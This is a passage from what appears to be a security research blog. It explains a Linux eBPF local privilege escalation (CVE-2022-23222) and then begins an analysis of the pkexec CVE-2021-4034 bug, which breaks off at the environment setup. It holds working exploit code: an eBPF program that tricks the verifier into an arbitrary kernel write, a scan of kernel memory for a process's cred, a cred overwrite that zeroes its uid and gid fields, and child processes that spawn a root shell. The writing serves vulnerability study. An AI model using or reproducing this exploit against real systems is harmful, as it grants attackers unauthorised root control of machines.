class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">bpf_insn</span> <span class="title">arbitrary_write</span>[] = {</span></span><br><span class="line"> <span class="comment">// Save r1: the kernel initializes r1 to point to the skb.</span></span><br><span class="line"> <span class="comment">// r9 = r1</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Look up the array value; r0 has type PTR_TO_MAP_VALUE_OR_NULL.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_map_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),</span><br><span class="line"> BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem),</span><br><span
class="line"> </span><br><span class="line"> <span class="comment">// Required NULL check: on the r0 != NULL path the verifier turns r0 into PTR_TO_MAP_VALUE.</span></span><br><span class="line"> <span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Save the array value pointer in r8.</span></span><br><span class="line"> <span class="comment">// r8 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Obtain a PTR_TO_MEM_OR_NULL pointer in r0.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line"> BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Copy the PTR_TO_MEM_OR_NULL pointer into r1.</span></span><br><span class="line"> <span class="comment">// r1 = r0</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> <span class="comment">// r1 = r1 + 1</span></span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>),</span><br><span
class="line"></span><br><span class="line"> <span class="comment">// Never taken: the ringbuf data area is PAGE_SIZE bytes, but each record also needs an 8-byte header,</span></span><br><span class="line"> <span class="comment">// so a PAGE_SIZE reservation always fails and r0 is NULL at runtime.</span></span><br><span class="line"> <span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>),</span><br><span class="line"> BPF_EXIT_INSN(),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// After the NULL check above, the verifier believes r0 == 0.</span></span><br><span class="line"> <span class="comment">// Because r1 was derived from r0, the verifier also believes r1 == 0, but at runtime r1 == 1.</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// r7 = (r1 + 1) * 8</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">1</span>),</span><br><span class="line"> BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, <span class="number">8</span>),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// The verifier believes r7 == 8, but at runtime r7 == 16.</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// While debugging, the array pointer always had the form 0xFFFF..........10.</span></span><br><span class="line"> <span class="comment">// Spill this pointer to r10-8.</span></span><br><span class="line"> <span class="comment">// *(u64 *)(r10 - 8) = r8</span></span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, <span class="number">-8</span>),</span><br><span
class="line"></span><br><span class="line"> <span class="comment">// The verifier checks an 8-byte write, but r7 = 16 bytes are written to r10-16, overwriting the array pointer at r10-8.</span></span><br><span class="line"> <span class="comment">// The bytes come from the packet and are attacker-controlled, so the pointer can be replaced with any address.</span></span><br><span class="line"> <span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, BPF_HDR_START_NET)</span></span><br><span class="line"> BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),</span><br><span class="line"> BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, <span class="number">-16</span>),</span><br><span class="line"> BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),</span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_5, <span class="number">1</span>),</span><br><span class="line"> BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_skb_load_bytes_relative),</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Reload the overwritten pointer.</span></span><br><span class="line"> <span class="comment">// r6 = *(u64 *)(r10 - 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, <span class="number">-8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Load the arguments passed in from user space through the array map.</span></span><br><span class="line"> <span class="comment">// r0 selects an 8-byte (r0 == 0) or 4-byte (otherwise) store; r1 is the value to write.</span></span><br><span class="line"> <span class="comment">// r0 = *(u64 *)(r8 + 0)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, <span class="number">0</span>),</span><br><span class="line"> <span class="comment">// r1 = *(u64 *)(r8 + 8)</span></span><br><span class="line"> BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, <span class="number">8</span>),</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Arbitrary write.</span></span><br><span class="line"> <span class="comment">// The store is accepted because the verifier still treats r6 as the array pointer.</span></span><br><span class="line"> <span class="comment">// if (r0 == 0) { *(u64*)r6 = r1 }</span></span><br><span class="line"> BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>),</span><br><span class="line"> BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, <span class="number">0</span>),</span><br><span class="line"> BPF_JMP_IMM(BPF_JA, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>),</span><br><span class="line"> <span class="comment">// else { *(u32*)r6 = r1 }</span></span><br><span class="line"> BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, <span class="number">0</span>),</span><br><span class="line"></span><br><span class="line"> BPF_MOV64_IMM(BPF_REG_0, <span class="number">0</span>),</span><br><span class="line"> BPF_EXIT_INSN()</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
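<p>The write program expects user space to prepare two inputs:</p>
<ul>
<li>the two u64 words it reads from the comm array value: a width selector at offset 0 and the value at offset 8;</li>
<li>16 packet bytes whose second half is the target address.</li>
</ul>
<p>The sketch below models that layout and the resulting store on ordinary memory. <code>struct write_args</code>, <code>make_write_args</code>, <code>make_payload</code> and <code>apply_write</code> are hypothetical, because the article does not show the user-space side. The sketch also assumes that the 16 bytes at the packet's network header are exactly the bytes user space sent.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout of the first 16 bytes of the comm array value. */
struct write_args {
    uint64_t width_sel; /* loaded into r0 from r8 + 0: 0 selects a u64 store, nonzero a u32 store */
    uint64_t value;     /* loaded into r1 from r8 + 8: the value to store */
};

void make_write_args(struct write_args *a, uint64_t value, int wide)
{
    assert(a != NULL);
    a->width_sel = wide ? 0 : 1;
    a->value = value;
}

/* 16 bytes copied to r10 - 16: 8 filler bytes, then the address that replaces the spilled pointer. */
void make_payload(uint8_t out[16], uint64_t target)
{
    assert(out != NULL);
    memset(out, 'A', 8);
    memcpy(out + 8, &target, sizeof(target)); /* host byte order (little-endian on x86-64) */
}

/* Mirrors the final branch of arbitrary_write, applied to normal memory instead of r6. */
void apply_write(void *dst, const struct write_args *a)
{
    assert(dst != NULL && a != NULL);
    if (a->width_sel == 0) {
        memcpy(dst, &a->value, sizeof(a->value)); /* BPF_STX_MEM(BPF_DW, ...) */
    } else {
        uint32_t lo = (uint32_t)a->value;         /* BPF_STX_MEM(BPF_W, ...) stores the low 32 bits */
        memcpy(dst, &lo, sizeof(lo));
    }
}
```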
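<h3 id="4-4-定位进程cred"><a href="#4-4-定位进程cred" class="headerlink" title="4.4 定位进程cred"></a>4.4 Locating the Process cred</h3><p>Debugging showed that the task_struct of a process, and with it the process's cred pointer, is sometimes located after the leaked array pointer. Because this is not guaranteed, the exploit spawns several processes to reduce the chance of failure.</p>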
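<p>Every spawned process sets its name to the same fixed marker string with <code>prctl(PR_SET_NAME, __ID__, 0, 0, 0)</code>. This places the marker in the <code>comm</code> field of each process's task_struct. The marker used here is <code>SCSLSCSL</code>.</p>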
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">spawn_processes</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < PROC_NUM; i++)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">pid_t</span> child = fork();</span><br><span class="line"> <span class="keyword">if</span> (child == <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">if</span> (prctl(PR_SET_NAME, __ID__, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not set name"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">uid_t</span> old = getuid();</span><br><span class="line"> 
kill(getpid(), SIGSTOP);</span><br><span class="line"> <span class="keyword">uid_t</span> uid = getuid();</span><br><span class="line"> <span class="keyword">if</span> (uid == <span class="number">0</span> && old != uid) {</span><br><span class="line"> OKF(<span class="string">"Enjoy root!"</span>);</span><br><span class="line"> system(<span class="string">"/bin/sh"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">exit</span>(uid);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (child < <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> child;</span><br><span class="line"> }</span><br><span class="line"> ctx->processes[i] = child;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
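<p>The naming step can be tested on its own. The kernel stores the name set with <code>PR_SET_NAME</code> in the <code>comm</code> field of <code>task_struct</code>, which holds 16 bytes including the terminating NUL. <code>SCSLSCSL</code> is exactly 8 bytes, so a single 8-byte read can match it. The Linux-only sketch below sets the marker and reads it back with <code>PR_GET_NAME</code>. <code>set_and_check_comm</code> is a hypothetical helper, not part of the exploit.</p>

```c
#include <assert.h>
#include <string.h>
#include <sys/prctl.h>

#define MARKER "SCSLSCSL" /* the marker used in this article */

/* Sets the calling thread's name to MARKER and reads it back.
   Returns 1 if the kernel reports exactly MARKER, 0 otherwise. */
int set_and_check_comm(void)
{
    char name[16] = {0}; /* PR_GET_NAME writes up to 16 bytes */

    assert(strlen(MARKER) == 8); /* fits a single u64 comparison in find_cred */
    if (prctl(PR_SET_NAME, MARKER, 0, 0, 0) != 0)
        return 0;
    if (prctl(PR_GET_NAME, name, 0, 0, 0) != 0)
        return 0;
    return strcmp(name, MARKER) == 0;
}
```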
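<p>Next, the arbitrary-read primitive is used to search the kernel memory after the array pointer for the <code>SCSLSCSL</code> string. A match identifies the <code>comm</code> field in the task_struct of one of the spawned processes, and the cred pointer is then read from that task_struct. As <code>find_cred</code> shows, the scan starts at <code>array_map + PAGE_SIZE</code> and reads up to <code>PAGE_SIZE * PAGE_SIZE</code> 8-byte words.</p>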
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">find_cred</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < PAGE_SIZE*PAGE_SIZE ; i++)</span><br><span class="line"> {</span><br><span class="line"> u64 val = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">kaddr_t</span> addr = ctx->array_map + PAGE_SIZE + i*<span 
class="number">0x8</span>;</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_read(ctx, addr, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p"</span>, addr);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// DEBUGF("addr %p = 0x%016x", addr, val);</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">memcmp</span>(&val, __ID__, <span class="keyword">sizeof</span>(val)) == <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">kaddr_t</span> cred_from_task = addr - <span class="number">0x10</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (arbitrary_read(ctx, cred_from_task + <span class="number">8</span>, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p + 8"</span>, cred_from_task);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (val == <span class="number">0</span> && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != <span class="number">0</span>) {</span><br><span class="line"> WARNF(<span class="string">"Could not read kernel address %p + 0"</span>, cred_from_task);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (val != <span class="number">0</span>) {</span><br><span class="line"> ctx->cred = (<span 
class="keyword">kaddr_t</span>)val;</span><br><span class="line"> DEBUGF(<span class="string">"task struct ~ %p"</span>, cred_from_task);</span><br><span class="line"> DEBUGF(<span class="string">"cred @ %p"</span>, ctx->cred);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
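<p>The offset logic in <code>find_cred</code> can be tried without a kernel by running the same checks over an ordinary array of 8-byte words. In the sketch below, the marker sits at index <code>i</code>. <code>words[i - 2]</code> corresponds to <code>cred_from_task</code> (<code>addr - 0x10</code>), and <code>words[i - 1]</code> corresponds to <code>cred_from_task + 8</code>. These two offsets are the ones <code>find_cred</code> hard-codes for the tested kernel. They are presumably the <code>real_cred</code> and <code>cred</code> pointers just before <code>comm</code>, but the article does not say. <code>scan_for_cred</code> is a hypothetical name.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scans words[0..n) for the 8-byte marker. On a hit at index i, prefers
 * words[i - 1] (cred_from_task + 8) and falls back to words[i - 2]
 * (cred_from_task + 0) when that is 0, mirroring find_cred.
 * Returns the pointer found, or 0 if nothing usable was found.
 */
uint64_t scan_for_cred(const uint64_t *words, size_t n, const char *marker)
{
    assert(words != NULL || n == 0);
    for (size_t i = 2; i < n; i++) {
        if (memcmp(&words[i], marker, 8) != 0)
            continue;
        uint64_t val = words[i - 1];   /* cred_from_task + 8 */
        if (val == 0)
            val = words[i - 2];        /* cred_from_task + 0 */
        if (val != 0)
            return val;
        /* both slots are empty: keep scanning, as find_cred does */
    }
    return 0;
}
```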
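<h3 id="4-5-实现提权"><a href="#4-5-实现提权" class="headerlink" title="4.5 实现提权"></a>4.5 Privilege Escalation</h3><p>Once the process's cred has been located, the arbitrary-write primitive overwrites its uid, gid, euid and egid fields with 0, which escalates the process to root.</p>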
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">overwrite_cred</span><span class="params">(<span class="keyword">context_t</span> *ctx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, <span class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, <span 
class="number">0</span>, BPF_W) != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
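<p>The <code>OFFSET_*_from_cred</code> constants depend on the kernel configuration. As an illustration, the sketch below models the start of <code>struct cred</code> as it is laid out when <code>CONFIG_DEBUG_CREDENTIALS</code> is disabled: a 4-byte <code>usage</code> counter followed by 4-byte uid and gid fields. It derives the offsets with <code>offsetof</code> and applies the same four 32-bit zero writes as <code>overwrite_cred</code> to a local copy. <code>struct cred_head</code> and <code>model_overwrite_cred</code> are hypothetical, and the real offsets should be taken from the target kernel.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified head of struct cred, assuming CONFIG_DEBUG_CREDENTIALS is off. */
struct cred_head {
    int32_t  usage;                    /* atomic_t usage */
    uint32_t uid, gid, suid, sgid;     /* kuid_t / kgid_t are 4-byte wrappers */
    uint32_t euid, egid, fsuid, fsgid;
};

/* Zeroes uid, gid, euid and egid with 32-bit writes, as overwrite_cred does. */
void model_overwrite_cred(uint8_t *cred)
{
    const size_t offs[] = {
        offsetof(struct cred_head, uid),  offsetof(struct cred_head, gid),
        offsetof(struct cred_head, euid), offsetof(struct cred_head, egid),
    };
    const uint32_t zero = 0;

    assert(cred != NULL);
    for (size_t i = 0; i < sizeof(offs) / sizeof(offs[0]); i++)
        memcpy(cred + offs[i], &zero, sizeof(zero));
}
```

<p>As in <code>overwrite_cred</code>, suid, sgid, fsuid and fsgid are left untouched. The spawned children only check <code>getuid()</code>, which returns the real uid.</p>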
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h2><p><a href="https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt" target="_blank" rel="noopener">cve-2022-23222-linux-kernel-ebpf-lpe.txt</a></p>
<p><a href="https://www.pentera.io/blog/the-good-bad-and-compromisable-aspects-of-linux-ebpf/" target="_blank" rel="noopener">The Good, Bad and Compromisable Aspects of Linux eBPF - Pentera</a></p>
<p><a href="https://ebpf.io/" target="_blank" rel="noopener">eBPF - Introduction, Tutorials & Community Resources</a></p>
<p><a href="https://www.kernel.org/doc/html/latest/bpf/instruction-set.html" target="_blank" rel="noopener">eBPF Instruction Set — The Linux Kernel documentation</a></p>
<p><a href="https://arthurchiao.art/blog/bpf-advanced-notes-1-zh/" target="_blank" rel="noopener">BPF Advanced Notes (Part 1): BPF Program (BPF Prog) Types Explained: Use Cases, Function Signatures, Execution Points, and Examples</a></p>
<p><a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html" target="_blank" rel="noopener">bpf-helpers(7) - Linux manual page</a></p>
<p><a href="https://www.containiq.com/post/libbpf" target="_blank" rel="noopener">Libbpf: A Beginners Guide</a></p>
<p><a href="https://nakryiko.com/posts/libbpf-bootstrap/" target="_blank" rel="noopener">Building BPF applications with libbpf-bootstrap</a></p>
<p><a href="https://nakryiko.com/posts/bpf-ringbuf/" target="_blank" rel="noopener">BPF ring buffer</a></p>
<p><a href="https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md" target="_blank" rel="noopener">bcc/reference_guide.md at master · iovisor/bcc</a></p>
</div>
<footer class="article-footer">
</footer>
</div>
</article>
<article id="post-2022/02/10/CVE-2021-4034" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2022/02/10/CVE-2021-4034/" class="article-date">
<time datetime="2022-02-14T14:00:00.000Z" itemprop="datePublished">2022-02-14</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2022/02/10/CVE-2021-4034/">CVE-2021-4034: Analysis of the pkexec Local Privilege Escalation Exploit</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
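<h2 id="0x00-作者"><a href="#0x00-作者" class="headerlink" title="0x00 作者"></a>0x00 Author</h2><p>钱程 (Qian Cheng) of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a> </p>
<h2 id="0x01-漏洞基本信息"><a href="#0x01-漏洞基本信息" class="headerlink" title="0x01 漏洞基本信息"></a>0x01 Vulnerability Overview</h2><p>polkit's pkexec program contains a local privilege escalation vulnerability. Vulnerable versions of pkexec do not handle the argument count correctly and end up trying to execute environment variables as commands. An attacker who controls the environment can use this to make pkexec execute arbitrary code. Successful exploitation lets an unprivileged local user gain administrator (root) privileges.</p>
<h3 id="软件简介"><a href="#软件简介" class="headerlink" title="软件简介"></a>Software Overview</h3><p><a href="https://gitlab.freedesktop.org/polkit/polkit/" target="_blank" rel="noopener">polkit</a> is an application-level toolkit that defines and audits authorization rules to mediate communication between processes with different privilege levels. Authorization decisions are centralized in a single framework, which determines whether an unprivileged process may access a privileged one.</p>
<p>Polkit performs authorization at the system level and provides a channel through which unprivileged processes can communicate with privileged ones. Unlike programs such as sudo, Polkit does not give a process full root privileges. Instead, it uses a centralized policy system for finer-grained authorization.</p>
<p>Polkit defines a set of actions, such as running GParted, and classifies users by group or user name, for example members of the wheel group. For each action, it then specifies whether particular users may perform it and whether extra confirmation is required first. One example is entering a password to prove that the user belongs to a given group.</p>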
<blockquote>
<p>https://wiki.archlinux.org/title/Polkit_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87)</p>
</blockquote>
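<h3 id="漏洞原理概括"><a href="#漏洞原理概括" class="headerlink" title="漏洞原理概括"></a>Root Cause in Brief</h3><p>When vulnerable versions of pkexec are invoked with an empty argument list (argc == 0), they mishandle the argument count and end up treating an environment variable as the command to execute. By controlling the environment, an attacker can make pkexec execute arbitrary code.</p>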
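<p>The argument-count bug can be modeled in a few lines. On Linux, <code>execve</code> places the <code>argv</code> pointers, a NULL terminator, and then the <code>envp</code> pointers contiguously on the new process's stack. pkexec's option loop starts at <code>n = 1</code>, so with <code>argc == 0</code> the loop body never runs. <code>argv[n]</code> then reads one slot past the empty argv, which is <code>envp[0]</code>. The sketch below reproduces this with an ordinary array. <code>option_loop_end</code> and <code>path_from_argv</code> are hypothetical names, and the real pkexec loop also parses options.</p>

```c
#include <assert.h>
#include <stddef.h>

/* pkexec-style loop: starts at n = 1 and stops at argc (option parsing omitted). */
int option_loop_end(int argc)
{
    int n;
    for (n = 1; n < argc; n++) {
        /* the real loop breaks at the first non-option argument */
    }
    return n;
}

/*
 * vec models the start of the pointer area: argv[0..argc-1], NULL, envp[0], ...
 * With argc == 0, vec[0] is the argv terminator and vec[1] is envp[0].
 */
const char *path_from_argv(const char **vec, int argc)
{
    assert(vec != NULL);
    return vec[option_loop_end(argc)]; /* like path = argv[n] */
}
```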
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>Background</h3><p>pkexec is a polkit program that runs a command as another user.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜ pkexec --<span class="built_in">help</span></span><br><span class="line">pkexec --version |</span><br><span class="line"> --<span class="built_in">help</span> |</span><br><span class="line"> --<span class="built_in">disable</span>-internal-agent |</span><br><span class="line"> [--user username] PROGRAM [ARGUMENTS...]</span><br><span class="line"></span><br><span class="line">See the pkexec manual page <span class="keyword">for</span> more details.</span><br></pre></td></tr></table></figure>
<p>When <code>--user</code> is not given, the target user defaults to <code>root</code>. For example:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pkexec reboot</span><br></pre></td></tr></table></figure>
<p><a href="https://imgtu.com/i/7X2MRK" target="_blank" rel="noopener"><img src="https://s4.ax1x.com/2022/01/27/7X2MRK.png" alt="7X2MRK.png"></a></p>
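<h3 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>Setting Up the Environment</h3><p>No special setup is needed. Any mainstream Linux distribution that ships a vulnerable pkexec will do.</p>
<p>Environment used for this test:</p>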
